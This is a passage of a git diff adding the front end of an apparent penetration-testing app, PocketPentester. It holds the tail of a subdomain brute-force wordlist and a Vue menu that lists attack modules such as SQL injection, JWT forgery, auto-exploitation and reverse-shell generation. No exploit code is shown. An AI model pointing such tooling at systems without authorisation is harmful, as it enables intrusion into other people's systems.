+epa
+epo
+eportal
+epos
+epsilon
+epub
+erp2
+erpapi
+ers
+esc
+escape
+esxi01
+etc
+everest
+evo
+ew
+excel
+exp
+export
+external
+extreme
+fab
+fac
+fad
+faster
+f.c
+fce
+fed
+ferreira
+fiber
+fil
+file2
+films
+filter1
+finger
+fisher
+fitness
+flat
+flora
+florian
+flowers
+force
+forever
+formations
+freehosting
+freelance
+freesoft
+frog
+fs1
+fsa
+ftth
+fuck
+gamers
+gaming
+gana
+gap
+gapps
+garfield
+gay
+gcc
+gcp
+gems
+ghs
+gil
+giovanni
+girls
+glass
+gmc
+gpon
+graduados
+graduation
+graphicdesign
+grc
+grr
+gst
+gw12
+gw5
+gym
+h3
+hack
+haru
+hb
+heaven
+hes
+high
+hightech
+hill
+his
+hl
+hmm
+hockey
+holiday
+honey
+host4
+hsm
+htc
+hyundai
+i2
+iax
+ibm
+ica
+icare
+icloud
+ide
+ideas
+idf
+idiomas
+iem
+ig
+igs
+incubator
+ingenieria
+ingress
+inscripciones
+insights
+intel
+internacional
+inv
+investor
+ioc
+ip6
+ipbx
+ipmi
+ipms
+irene
+ismail
+isp2
+ist
+itm
+ivr
+ivy
+jaeger
+jake
+jamf
+jane
+jas
+jason
+jay
+jeff
+jelly
+jmc
+jn
+jps
+jun
+k1
+k2
+k3
+kaka
+kate
+kf
+kfc
+kg
+khm
+kiev
+kiki
+kims
+kitty
+kkkk
+koz
+kps
+kratos
+kts
+kvccdufy
+l3
+lab3
+labo
+las
+lcms
+ld
+ldaps
+leads
+legend
+legolas
+lemmy
+letsencrypt
+lewis
+lf
+lhr
+lina
+lincoln
+lists2
+livestream
+livetv
+lmc
+lmsplus
+ln
+lnk
+loc
+log1
+logo
+loli
+lyra
+m10
+m6
+maggie
+mail04
+mail17
+mail.c
+mailserver2
+mail.student
+mandarin
+mano
+manu
+marathon
+mario
+marko
+marshall
+marte
+masters
+mautic
+maxwell
+m.c
+mci
+mcstaging
+mct
+mdc
+medias
+medical
+medidor
+melody
+mep
+message
+met
+mfi
+mhs
+micasa
+michelle
+midgard
+miki
+miku
+mila
+mina
+mirage
+miranda
+mirror1
+miss
+mjj
+mn
+mobil
+mobile2
+mod
+moda
+moderator
+mol
+monkey
+monty
+moo
+moose
+mordor
+moskva
+mrs
+mts
+mtv
+muse
+mv
+mvp
+mx-01
+mx30
+mx9
+myadmin
+mydomain
+mysqladmin
+mytv
+n1
+n3
+nag
+nam
+nash
+nca
+nd
+ndc
+nessus
+netops
+newyork
+nexo
+nextcatalog
+nhaphoc
+ni
+nico
+nina
+nix
+nj
+no1
+noble
+noe
+notice
+ns18
+ns23
+ns32
+ns50
+num
+nutrition
+nyc
+oauth2
+ob
+oberon
+occ
+odontologia
+oil
+oka
+oko
+olive
+olympus
+omar
+omg
+onboarding
+onedrive
+opal
+opt
+optima
+ora
+orbit
+ost
+ov
+overleaf
+ovh
+pablo
+pace
+panther
+parker
+pars
+party
+patricia
+paymentgateway
+pc-printer-discovery
+pepper
+pfs
+pgm
+phc
+philip
+philips
+phobos
+picard
+pim
+pinky
+pit
+pizza
+plane
+plasma
+pmt
+polo
+pong
+pops
+porsche
+postoffice
+ppl
+pra
+practice
+prd
+premier
+prensa
+pri
+processoseletivo
+procurement
+prograd
+program
+programs
+prop
+protocolo
+prox
+proxmox1
+proxy01
+psd
+pse
+psrp
+pta
+publicaciones
+publication
+pure
+pv1
+pwa
+py
+qmail
+quake
+queue
+qwer
+rambo
+rap
+raptor
+raven
+r.c
+rcmail
+rdv
+rede
+regis
+rei
+relatorios
+relaunch
+relay02
+release
+repos
+rescue
+reservation
+resolver1
+resolver2
+resource
+retro
+return
+rewards
+rm01
+rmc
+rns1
+rocky
+roman
+rpage
+rpg
+rproxy
+rsu
+rus
+rusifeng
+rv
+ryan
+sag
+sai
+salsa
+sams
+sba
+sc2
+schools
+scorpio
+scorpion
+sed
+seed
+self
+sep
+serv1
+server9
+servers
+service2
+sfc
+sfs
+sgc
+sge
+sgtm
+shop2
+sierra
+sil
+silva
+simon
+simone
+skype
+sls
+smarthome
+smg
+smm
+sms2
+smsapi
+smtp1.c
+smtp2.c
+smtprelay
+snipeit
+soho
+soma
+soso
+soul
+spacewalk
+spain
+spd
+special
+speedtest4
+spike
+spiral
+spot
+spring
+sputnik
+ssd
+ssi
+ssltest
+stash
+station
+stone
+storage2
+stories
+stp
+stream1
+streamer
+stu
+style
+styx
+su
+sugarcrm
+superset
+swan
+switch1
+synapse
+sync2
+synology
+tab
+tam
+tap
+target
+teacher
+teamviewer
+ten
+terranova
+test10
+test12
+test22
+testdrive
+teste1
+tethys
+theatre
+thread
+tiki
+titanium
+tnc
+tns
+toast
+tock
+today
+torrent
+train
+true
+try
+tsp
+turnos
+two
+uma
+universal
+universe
+userportal
+valentin
+vanilla
+ve
+vh
+vi
+vid
+viktor
+vince
+vintage
+visual
+vita
+vk
+vm5
+vnc
+vol
+vpn-1
+vpn5
+wall
+wang
+web12
+webfarm
+weblab
+webmaster
+webproxy
+webserver2
+welfare
+will
+william
+williams
+willow
+winner
+wisp
+wolverine
+workday
+wtest
+ww3
+www12
+www.admission
+www.ava
+www.ca
+www.dc
+www.download
+www.ead
+www.ee
+www.hosting
+www.monitor
+www.pay
+www.physics
+wwwqa
+www.qr
+www.sec
+www.service
+www.sistemas
+www.social
+www.transparencia
+www.us
+www.weather
+x2
+xanadu
+xenon
+xmas
+xtreme
+yc
+yggdrasil
+young
+yoyo
+yt
+yui
+yuki
+yyy
+z3950
+zeta
+00
+0000
+1000
+112
+1123
+114
+120
+1233
+129
+130
+132
+135
+139
+144
+16
+2003
+2012
+210
+223
+225
+29
+31
+314
+32
+320
+34
+50
+520
+6666
+78
+83
+a7
+a8
+abacus
+abdul
+ac2
+acct
+acd
+acs1
+acs2
+action
+activity
+add
+adel
+admin3
+advertising
+aero
+agile
+aia
+aic
+ak
+aleph
+alfred
+allen
+alm
+alum
+alumnos
+andy
+annex
+ans
+antispam2
+apc2
+api4
+api.demo
+apigw
+apim
+apiqa
+app12
+app6
+april
+aquarius
+aram
+archie
+architecture
+archiv
+archivos
+area51
+argon
+ari
+aries
+ars
+arte
+asis
+assine
+assistance
+athome
+atlanta
+atlantic
+atrium
+autodiscover.365
+autodiscover.live
+autodiscover.mail
+autodiscover.staff
+avatar
+awe
+awinds
+b4
+babel
+backdoor
+backuppc
+badger
+baidu
+bali
+bam
+bandb
+bandwidth
+bang
+bari
+baza
+bbb1
+bcm
+bcs
+bds
+bebe
+bec
+beehive
+beer
+beijing
+belarus
+bestproxy
+bewerbung
+bhc
+bibliotecadigital
+bilbo
diff --git a/src/App.vue b/src/App.vue
new file mode 100644
index 0000000..cfd3b56
--- /dev/null
+++ b/src/App.vue
@@ -0,0 +1,611 @@
+<script setup lang="ts">
+import { computed, onMounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import PortScan from "./components/modules/PortScan.vue";
+import SubEnum from "./components/modules/SubEnum.vue";
+import HttpProbe from "./components/modules/HttpProbe.vue";
+import Takeover from "./components/modules/Takeover.vue";
+import Sqli from "./components/modules/Sqli.vue";
+import Xss from "./components/modules/Xss.vue";
+import Jwt from "./components/modules/Jwt.vue";
+import Xploiter from "./components/modules/Xploiter.vue";
+import AutoPwn from "./components/modules/AutoPwn.vue";
+import LanMap from "./components/modules/LanMap.vue";
+import Repeater from "./components/modules/Repeater.vue";
+import DirFuzz from "./components/modules/DirFuzz.vue";
+import PayloadGen from "./components/modules/PayloadGen.vue";
+import AdminFinder from "./components/modules/AdminFinder.vue";
+import FormBrute from "./components/modules/FormBrute.vue";
+import DnsTools from "./components/modules/DnsTools.vue";
+import SslScan from "./components/modules/SslScan.vue";
+import Banner from "./components/modules/Banner.vue";
+import Encoder from "./components/modules/Encoder.vue";
+import HashTools from "./components/modules/HashTools.vue";
+import DomainGrabber from "./components/modules/DomainGrabber.vue";
+import SplashScreen from "./components/SplashScreen.vue";
+
+type ToolId = "ports" | "subs" | "httpx" | "takeover" | "sqli" | "xss" | "jwt" | "xploiter" | "autopwn" | "lanmap" | "repeater" | "dirfuzz" | "payloadgen" | "adminfinder" | "formbrute" | "dns" | "ssl" | "banner" | "encoder" | "hash" | "domgrab";
+
+interface Tool {
+  id: ToolId;
+  code: string;
+  name: string;
+  tagline: string;
+  desc: string;
+  cat: "recon" | "exploit" | "utility" | "wifi" | "manual";
+  severity: "info" | "low" | "medium" | "high" | "critical";
+}
+
+const tools: Tool[] = [
+  { id: "ports",    code: "01", name: "port-scan",  tagline: "tcp connect",       desc: "async port discovery, service hints",                cat: "recon",   severity: "info" },
+  { id: "subs",     code: "02", name: "subdomain",  tagline: "passive + brute",   desc: "crt.sh enum, wordlist bruteforce",                   cat: "recon",   severity: "info" },
+  { id: "httpx",    code: "03", name: "http-probe", tagline: "status + tech",     desc: "fingerprint live hosts, tech stack",                 cat: "recon",   severity: "info" },
+  { id: "takeover", code: "04", name: "takeover",   tagline: "CNAME hijack",      desc: "S3/GH/Heroku/Azure/Vercel/+15 more",                 cat: "exploit", severity: "high" },
+  { id: "sqli",     code: "05", name: "sqli",       tagline: "error/bool/time",   desc: "auto-detect injection, 6 DBMS",                      cat: "exploit", severity: "critical" },
+  { id: "xss",      code: "06", name: "xss",        tagline: "context-aware",     desc: "canary reflection, HTML/attr/JS payloads",           cat: "exploit", severity: "high" },
+  { id: "jwt",      code: "07", name: "jwt",        tagline: "alg:none + brute",  desc: "decode + HMAC crack + forgery",                      cat: "exploit", severity: "critical" },
+  { id: "xploiter", code: "08", name: "xploiter",   tagline: "template engine",   desc: "YAML-driven RCE/LFI/SSRF/SSTI, bring your own template", cat: "exploit", severity: "critical" },
+  { id: "autopwn",  code: "09", name: "auto-pwn",   tagline: "full chain",        desc: "domain → subs → probe → exploit, one-button pipeline", cat: "exploit", severity: "critical" },
+  { id: "lanmap",   code: "10", name: "lan-map",    tagline: "local network",     desc: "discover devices on WiFi: TCP sweep + mDNS + SSDP",  cat: "wifi",    severity: "info" },
+  { id: "repeater", code: "11", name: "repeater",   tagline: "burp-lite",         desc: "manual HTTP: craft, send, inspect, replay, curl export", cat: "manual",  severity: "info" },
+  { id: "dirfuzz",  code: "12", name: "dir-fuzz",   tagline: "content discovery", desc: "wordlist + ext bruteforce, recursive, size/status filter", cat: "exploit", severity: "medium" },
+  { id: "payloadgen", code: "13", name: "payload-gen", tagline: "shells + encoders", desc: "reverse/bind shells 15+ langs, webshells, msfvenom, encoders", cat: "utility", severity: "info" },
+  { id: "adminfinder", code: "14", name: "admin-finder", tagline: "panel discovery", desc: "320+ admin paths, CMS/platform fingerprint, login form detect", cat: "exploit", severity: "medium" },
+  { id: "formbrute",   code: "15", name: "form-brute",   tagline: "login bruteforce", desc: "POST/GET credential attack, regex match, CSRF handling", cat: "exploit", severity: "high" },
+  { id: "dns",         code: "16", name: "dns",           tagline: "record lookup",    desc: "A/AAAA/MX/TXT/NS/CNAME/SOA/CAA + DNSSEC + AXFR",     cat: "wifi",    severity: "info" },
+  { id: "ssl",         code: "17", name: "ssl-scan",      tagline: "tls inspector",    desc: "cert chain, SANs, expiry, signature algo, weak version", cat: "wifi",    severity: "info" },
+  { id: "banner",      code: "18", name: "banner-grab",   tagline: "service fingerprint", desc: "TCP banner + SSH/SMTP/FTP/HTTP/Redis/MySQL recognize", cat: "wifi", severity: "info" },
+  { id: "encoder",     code: "19", name: "encoder",       tagline: "chain transforms", desc: "b64/url/hex/html/rot13/morse/jwt — pipeline ops",    cat: "utility", severity: "info" },
+  { id: "hash",        code: "20", name: "hash-tools",    tagline: "id + calc",        desc: "identify 28+ hash types, compute MD5/SHA/CRC32",    cat: "utility", severity: "info" },
+  { id: "domgrab",     code: "21", name: "domain-grab",   tagline: "bulk TLD harvest", desc: "grab domains per TLD from crt.sh/urlscan/wayback + IANA catalog", cat: "recon", severity: "info" },
+];
+
+const active = ref<ToolId | null>(null);
+const banner = ref<string>("");
+const clock = ref<string>("");
+const showSplash = ref(true);
+
+function tick() {
+  const d = new Date();
+  clock.value = d.toTimeString().slice(0, 8);
+}
+
+onMounted(async () => {
+  try { banner.value = await invoke<string>("banner"); }
+  catch { banner.value = "PocketPentester"; }
+  tick();
+  setInterval(tick, 1000);
+});
+
+const activeTool = computed(() => tools.find((t) => t.id === active.value) ?? null);
+
+interface Group {
+  id: Tool["cat"];
+  label: string;
+  desc: string;
+  mark: string;
+}
+
+const groups: Group[] = [
+  { id: "recon",   label: "recon",         desc: "passive + active reconnaissance", mark: "◉" },
+  { id: "exploit", label: "exploitation",  desc: "attack vectors & vulnerability",  mark: "⚔" },
+  { id: "manual",  label: "manual",        desc: "hand-crafted request tooling",    mark: "✎" },
+  { id: "wifi",    label: "network",       desc: "local / wifi reconnaissance",     mark: "≋" },
+  { id: "utility", label: "utility",       desc: "helpers & payload generation",    mark: "⚙" },
+];
+
+const grouped = computed(() =>
+  groups.map((g) => ({ ...g, tools: tools.filter((t) => t.cat === g.id) }))
+        .filter((g) => g.tools.length > 0)
+);
+
+function back() { active.value = null; }
+function open(id: ToolId) { active.value = id; }
+</script>
+
+<template>
+  <SplashScreen v-if="showSplash" @done="showSplash = false" />
+  <div class="shell" v-show="!showSplash">
+    <!-- ============ HEADER ============ -->
+    <header class="hdr">
+      <div class="hdr-top">
+        <button v-if="activeTool" class="hdr-back" @click="back" title="back to arsenal">◀ back</button>
+        <div class="banner-wrap">
+          <pre class="banner-art">┏━┓┏━┓┏━╸╻┏ ┏━╸╺┳╸  ┏━┓┏━╸┏┓╻╺┳╸┏━╸┏━┓╺┳╸┏━╸┏━┓
+┣━┛┃ ┃┃  ┣┻┓┣╸  ┃   ┣━┛┣╸ ┃┗┫ ┃ ┣╸ ┗━┓ ┃ ┣╸ ┣┳┛
+╹  ┗━┛┗━╸╹ ╹┗━╸ ╹   ╹  ┗━╸╹ ╹ ╹ ┗━╸┗━┛ ╹ ┗━╸╹┗╸</pre>
+        </div>
+      </div>
+      <div class="hdr-meta">
+        <span class="tag">v0.1.0</span>
+        <span class="hdr-spacer" />
+        <span class="hdr-status">
+          <span class="pulse" />
+          {{ activeTool ? "armed" : "idle" }}
+        </span>
+        <span class="hdr-clock">{{ clock }}</span>
+      </div>
+      <div class="hdr-sub">
+        <span class="crumb-user">root@pocket</span>
+        <span class="crumb-sep">:</span>
+        <span v-if="activeTool" class="crumb-path">~/arsenal/{{ activeTool.name }}</span>
+        <span v-else class="crumb-path">~/arsenal</span>
+        <span class="crumb-sep">$</span>
+        <span v-if="!activeTool" class="crumb-cmd"> ls -la</span>
+        <span class="crumb-cursor">▊</span>
+      </div>
+    </header>
+
+    <!-- ============ MAIN ============ -->
+    <main class="main">
+      <!-- ARSENAL / HOME -->
+      <div v-show="!activeTool" class="arsenal">
+        <div class="arsenal-stats">
+          <span class="stats-total">{{ tools.length }} modules</span>
+          <span v-for="g in grouped" :key="g.id" class="stats-grp" :class="`cat-${g.id}`">
+            <span class="stats-mark">{{ g.mark }}</span>
+            <span>{{ g.tools.length }} {{ g.label }}</span>
+          </span>
+        </div>
+
+        <div class="group-stack">
+          <section v-for="g in grouped" :key="g.id" class="group" :class="`cat-${g.id}`">
+            <header class="group-head">
+              <span class="grp-mark">{{ g.mark }}</span>
+              <span class="grp-label">{{ g.label }}</span>
+              <span class="grp-desc">// {{ g.desc }}</span>
+              <span class="grp-count">[{{ g.tools.length }}]</span>
+              <span class="grp-rule"></span>
+            </header>
+            <div class="grid">
+              <button
+                v-for="t in g.tools"
+                :key="t.id"
+                class="tile"
+                :class="[`cat-${t.cat}`, `sev-${t.severity}`]"
+                @click="open(t.id)"
+              >
+                <div class="tile-top">
+                  <span class="tile-code">[{{ t.code }}]</span>
+                  <span class="tile-mark">{{ g.mark }}</span>
+                </div>
+                <div class="tile-name">{{ t.name }}</div>
+                <div class="tile-tag">{{ t.tagline }}</div>
+                <div class="tile-desc">{{ t.desc }}</div>
+                <div class="tile-foot">
+                  <span class="sev" :class="`sev-${t.severity}`">{{ t.severity }}</span>
+                  <span class="tile-arrow">▶</span>
+                </div>
+              </button>
+            </div>
+          </section>
+        </div>
+
+      </div>
+
+      <!-- ACTIVE TOOL -->
+      <div v-if="activeTool" class="tool">
+        <PortScan v-if="active === 'ports'" />
+        <SubEnum v-else-if="active === 'subs'" />
+        <HttpProbe v-else-if="active === 'httpx'" />
+        <Takeover v-else-if="active === 'takeover'" />
+        <Sqli v-else-if="active === 'sqli'" />
+        <Xss v-else-if="active === 'xss'" />
+        <Jwt v-else-if="active === 'jwt'" />
+        <Xploiter v-else-if="active === 'xploiter'" />
+        <AutoPwn v-else-if="active === 'autopwn'" />
+        <LanMap v-else-if="active === 'lanmap'" />
+        <Repeater v-else-if="active === 'repeater'" />
+        <DirFuzz v-else-if="active === 'dirfuzz'" />
+        <PayloadGen v-else-if="active === 'payloadgen'" />
+        <AdminFinder v-else-if="active === 'adminfinder'" />
+        <FormBrute v-else-if="active === 'formbrute'" />
+        <DnsTools v-else-if="active === 'dns'" />
+        <SslScan v-else-if="active === 'ssl'" />
+        <Banner v-else-if="active === 'banner'" />
+        <Encoder v-else-if="active === 'encoder'" />
+        <HashTools v-else-if="active === 'hash'" />
+        <DomainGrabber v-else-if="active === 'domgrab'" />
+      </div>
+    </main>
+
+    <!-- ============ FOOTER ============ -->
+    <footer class="foot">
+      <span class="foot-l">{{ banner }}</span>
+    </footer>
+  </div>
+</template>
+
+<style scoped>
+.shell {
+  height: 100%;
+  display: flex;
+  flex-direction: column;
+  overflow: hidden;
+  padding: env(safe-area-inset-top) env(safe-area-inset-right) env(safe-area-inset-bottom) env(safe-area-inset-left);
+}
+
+/* ============ HEADER ============ */
+.hdr {
+  flex-shrink: 0;
+  border-bottom: 1px solid var(--border);
+  background: var(--bg-elev);
+  position: relative;
+}
+.hdr::before {
+  content: '';
+  position: absolute;
+  bottom: -1px;
+  left: 0;
+  width: 50%;
+  height: 1px;
+  background: linear-gradient(90deg, var(--alert), transparent);
+  opacity: 0.6;
+}
+.hdr-top {
+  display: flex;
+  align-items: flex-start;
+  gap: 8px;
+  padding: 8px 12px 4px;
+  min-width: 0;
+}
+.hdr-back {
+  color: var(--alert);
+  border: 1px solid var(--alert);
+  padding: 3px 8px;
+  font-size: 11px;
+  letter-spacing: 0.05em;
+  transition: background 0.15s;
+  flex-shrink: 0;
+  height: fit-content;
+  margin-top: 4px;
+}
+.hdr-back:hover { background: var(--alert); color: #fff; }
+
+.banner-wrap {
+  flex: 1;
+  min-width: 0;
+  overflow-x: auto;
+  scrollbar-width: none;
+}
+.banner-wrap::-webkit-scrollbar { display: none; }
+.banner-art {
+  color: var(--accent);
+  font-size: 9px;
+  line-height: 1.1;
+  font-weight: 700;
+  text-shadow: 0 0 10px rgba(255, 47, 74, 0.25), 0 0 2px rgba(255, 255, 255, 0.4);
+  margin: 0;
+  white-space: pre;
+  font-family: var(--mono);
+}
+
+.hdr-meta {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  padding: 0 12px;
+  flex-wrap: wrap;
+}
+.tag {
+  font-size: 10px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.15em;
+  padding: 1px 6px;
+  border: 1px solid var(--border);
+  flex-shrink: 0;
+}
+.tag-warn { color: var(--warn); border-color: var(--warn); }
+
+.hdr-spacer { flex: 1; min-width: 0; }
+
+.hdr-status {
+  display: flex;
+  align-items: center;
+  gap: 5px;
+  font-size: 10px;
+  color: var(--alert);
+  text-transform: uppercase;
+  letter-spacing: 0.15em;
+  flex-shrink: 0;
+}
+.pulse {
+  width: 6px; height: 6px;
+  background: var(--alert);
+  box-shadow: 0 0 8px var(--alert);
+  animation: pulse 1.5s ease-in-out infinite;
+}
+@keyframes pulse { 50% { opacity: 0.3; transform: scale(0.75); } }
+.hdr-clock {
+  font-size: 10px;
+  color: var(--fg-dim);
+  font-variant-numeric: tabular-nums;
+  flex-shrink: 0;
+}
+
+.hdr-sub {
+  padding: 4px 12px 6px;
+  font-size: 11px;
+  display: flex;
+  gap: 2px;
+  flex-wrap: nowrap;
+  overflow: hidden;
+  white-space: nowrap;
+}
+.crumb-user { color: var(--alert); }
+.crumb-path { color: var(--info); overflow: hidden; text-overflow: ellipsis; }
+.crumb-cmd { color: var(--fg); margin-left: 4px; }
+.crumb-sep { color: var(--fg-ghost); }
+.crumb-cursor { color: var(--accent); animation: blink 1s steps(2) infinite; }
+@keyframes blink { 50% { opacity: 0; } }
+
+/* ============ MAIN ============ */
+.main {
+  flex: 1;
+  min-height: 0;
+  display: flex;
+  flex-direction: column;
+  overflow: hidden;
+}
+
+/* ARSENAL */
+.arsenal {
+  flex: 1;
+  overflow-y: auto;
+  padding: 12px;
+  display: flex;
+  flex-direction: column;
+  gap: 12px;
+}
+.arsenal-stats {
+  display: flex;
+  gap: 10px;
+  font-size: 11px;
+  color: var(--fg-dim);
+  padding: 6px 10px;
+  border: 1px solid var(--border);
+  background: var(--bg-panel);
+  flex-wrap: wrap;
+  align-items: center;
+}
+.stats-total {
+  color: var(--fg);
+  font-weight: 700;
+  letter-spacing: 0.1em;
+  text-transform: uppercase;
+  font-size: 10px;
+}
+.stats-grp {
+  display: inline-flex;
+  align-items: center;
+  gap: 4px;
+  padding: 2px 6px;
+  border: 1px solid var(--border-hot);
+  font-size: 10px;
+  letter-spacing: 0.05em;
+}
+.stats-mark { font-size: 11px; }
+.stats-grp.cat-recon { color: var(--info); }
+.stats-grp.cat-exploit { color: var(--alert); }
+.stats-grp.cat-wifi { color: var(--warn); }
+.stats-grp.cat-manual { color: var(--valid); }
+.stats-grp.cat-utility { color: var(--fg); }
+
+.group-stack {
+  display: flex;
+  flex-direction: column;
+  gap: 14px;
+}
+
+.group { display: flex; flex-direction: column; gap: 8px; }
+.group-head {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  font-size: 11px;
+  padding: 2px 0;
+}
+.grp-mark { font-size: 14px; flex-shrink: 0; }
+.group.cat-recon .grp-mark { color: var(--info); }
+.group.cat-exploit .grp-mark { color: var(--alert); }
+.group.cat-wifi .grp-mark { color: var(--warn); }
+.group.cat-manual .grp-mark { color: var(--valid); }
+.group.cat-utility .grp-mark { color: var(--fg); }
+.grp-label {
+  font-weight: 700;
+  letter-spacing: 0.2em;
+  text-transform: uppercase;
+  font-size: 12px;
+  color: var(--fg);
+}
+.group.cat-recon .grp-label { color: var(--info); }
+.group.cat-exploit .grp-label { color: var(--alert); }
+.group.cat-wifi .grp-label { color: var(--warn); }
+.group.cat-manual .grp-label { color: var(--valid); }
+.grp-desc {
+  color: var(--fg-ghost);
+  font-size: 10px;
+  font-style: italic;
+}
+.grp-count {
+  color: var(--fg-dim);
+  font-size: 10px;
+  font-variant-numeric: tabular-nums;
+  letter-spacing: 0.1em;
+}
+.grp-rule {
+  flex: 1;
+  height: 1px;
+  background: linear-gradient(90deg, var(--border-hot), transparent);
+  margin-left: 4px;
+}
+.group.cat-recon .grp-rule { background: linear-gradient(90deg, rgba(127, 179, 213, 0.3), transparent); }
+.group.cat-exploit .grp-rule { background: linear-gradient(90deg, rgba(255, 47, 74, 0.3), transparent); }
+.group.cat-wifi .grp-rule { background: linear-gradient(90deg, rgba(212, 165, 55, 0.3), transparent); }
+.group.cat-manual .grp-rule { background: linear-gradient(90deg, rgba(92, 217, 130, 0.3), transparent); }
+
+.grid {
+  display: grid;
+  grid-template-columns: repeat(auto-fill, minmax(160px, 1fr));
+  gap: 8px;
+}
+
+.tile {
+  display: flex;
+  flex-direction: column;
+  gap: 4px;
+  text-align: left;
+  padding: 10px 12px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  cursor: pointer;
+  position: relative;
+  overflow: hidden;
+  transition: border-color 0.15s, background 0.15s;
+  min-height: 130px;
+}
+.tile::before {
+  content: '';
+  position: absolute;
+  top: 0; left: 0;
+  width: 2px; height: 100%;
+  background: var(--border-hot);
+  transition: background 0.15s;
+}
+.tile.cat-exploit::before { background: var(--alert); opacity: 0.5; }
+.tile.cat-recon::before { background: var(--info); opacity: 0.4; }
+.tile.cat-wifi::before { background: var(--warn); opacity: 0.5; }
+.tile.cat-manual::before { background: var(--valid); opacity: 0.5; }
+.tile.cat-utility::before { background: var(--fg-dim); opacity: 0.5; }
+.tile:hover {
+  border-color: var(--alert);
+  background: rgba(255, 47, 74, 0.04);
+}
+.tile:hover::before { opacity: 1; box-shadow: 0 0 10px currentColor; }
+.tile:active { transform: translateY(1px); }
+
+.tile-top {
+  display: flex;
+  justify-content: space-between;
+  align-items: center;
+}
+.tile-code {
+  color: var(--fg-ghost);
+  font-size: 10px;
+  letter-spacing: 0.1em;
+}
+.tile-mark { font-size: 12px; }
+.cat-exploit .tile-mark { color: var(--alert); }
+.cat-recon .tile-mark { color: var(--info); }
+.cat-wifi .tile-mark { color: var(--warn); }
+.cat-manual .tile-mark { color: var(--valid); }
+.cat-utility .tile-mark { color: var(--fg-dim); }
+
+.tile-name {
+  font-size: 15px;
+  font-weight: 700;
+  color: var(--fg);
+  letter-spacing: -0.01em;
+  word-break: break-word;
+}
+.tile-tag {
+  font-size: 10px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  word-break: break-word;
+}
+.tile-desc {
+  font-size: 11px;
+  color: var(--fg-dim);
+  line-height: 1.4;
+  flex: 1;
+  word-break: break-word;
+  overflow: hidden;
+  display: -webkit-box;
+  -webkit-line-clamp: 2;
+  line-clamp: 2;
+  -webkit-box-orient: vertical;
+}
+.tile-foot {
+  display: flex;
+  justify-content: space-between;
+  align-items: center;
+  margin-top: 2px;
+}
+.tile-arrow {
+  color: var(--fg-ghost);
+  font-size: 10px;
+  transition: color 0.15s, transform 0.15s;
+}
+.tile:hover .tile-arrow { color: var(--alert); transform: translateX(2px); }
+
+.disclaimer {
+  margin-top: auto;
+  padding: 6px 10px;
+  font-size: 10px;
+  color: var(--warn);
+  border: 1px solid rgba(212, 165, 55, 0.3);
+  background: rgba(212, 165, 55, 0.05);
+  display: flex;
+  align-items: center;
+  gap: 8px;
+  text-transform: uppercase;
+  letter-spacing: 0.08em;
+}
+.warn-mark {
+  width: 16px; height: 16px;
+  display: inline-flex;
+  align-items: center;
+  justify-content: center;
+  border: 1px solid var(--warn);
+  color: var(--warn);
+  font-weight: 700;
+  flex-shrink: 0;
+}
+
+/* TOOL VIEW */
+.tool {
+  flex: 1;
+  min-height: 0;
+  display: flex;
+  padding: 10px 12px;
+  overflow: hidden;
+}
+.tool > :deep(.module) {
+  width: 100%;
+  min-width: 0;
+}
+
+/* ============ FOOTER ============ */
+.foot {
+  flex-shrink: 0;
+  padding: 5px 12px;
+  border-top: 1px solid var(--border);
+  background: var(--bg-elev);
+  font-size: 10px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  white-space: nowrap;
+  overflow: hidden;
+  text-overflow: ellipsis;
+}
+
+/* ============ RESPONSIVE ============ */
+@media (max-width: 480px) {
+  .banner-art { font-size: 7px; }
+  .hdr-clock { display: none; }
+  .grid { grid-template-columns: repeat(auto-fill, minmax(140px, 1fr)); }
+  .arsenal { padding: 8px; }
+}
+@media (max-width: 360px) {
+  .banner-art { font-size: 6px; }
+  .grid { grid-template-columns: 1fr 1fr; gap: 6px; }
+  .tile { padding: 8px 10px; min-height: 110px; }
+  .tile-name { font-size: 14px; }
+  .tag-warn { display: none; }
+}
+</style>
diff --git a/src/assets/vue.svg b/src/assets/vue.svg
new file mode 100644
index 0000000..770e9d3
--- /dev/null
+++ b/src/assets/vue.svg
@@ -0,0 +1 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="iconify iconify--logos" width="37.07" height="36" preserveAspectRatio="xMidYMid meet" viewBox="0 0 256 198"><path fill="#41B883" d="M204.8 0H256L128 220.8L0 0h97.92L128 51.2L157.44 0h47.36Z"></path><path fill="#41B883" d="m0 0l128 220.8L256 0h-51.2L128 132.48L50.56 0H0Z"></path><path fill="#35495E" d="M50.56 0L128 133.12L204.8 0h-47.36L128 51.2L97.92 0H50.56Z"></path></svg>
\ No newline at end of file
diff --git a/src/components/Prompt.vue b/src/components/Prompt.vue
new file mode 100644
index 0000000..43147f4
--- /dev/null
+++ b/src/components/Prompt.vue
@@ -0,0 +1,53 @@
+<script setup lang="ts">
+defineProps<{ label: string; modelValue: string; placeholder?: string }>();
+defineEmits<{ (e: "update:modelValue", v: string): void }>();
+</script>
+
+<template>
+  <label class="prompt">
+    <span class="plabel">{{ label }}</span>
+    <span class="parrow">»</span>
+    <input
+      :value="modelValue"
+      :placeholder="placeholder"
+      spellcheck="false"
+      autocomplete="off"
+      autocapitalize="off"
+      @input="$emit('update:modelValue', ($event.target as HTMLInputElement).value)"
+    />
+  </label>
+</template>
+
+<style scoped>
+.prompt {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  border: 1px solid var(--border);
+  padding: 6px 8px;
+  background: var(--bg-panel);
+  transition: border-color 0.15s;
+}
+.prompt:focus-within {
+  border-color: var(--accent);
+}
+.plabel {
+  color: var(--accent);
+  font-weight: 500;
+  font-size: 11px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  min-width: 72px;
+}
+.parrow {
+  color: var(--fg-dim);
+}
+input {
+  flex: 1;
+  color: var(--fg);
+  min-width: 0;
+}
+input::placeholder {
+  color: var(--fg-ghost);
+}
+</style>
diff --git a/src/components/SplashScreen.vue b/src/components/SplashScreen.vue
new file mode 100644
index 0000000..2e0ce02
--- /dev/null
+++ b/src/components/SplashScreen.vue
@@ -0,0 +1,375 @@
+<script setup lang="ts">
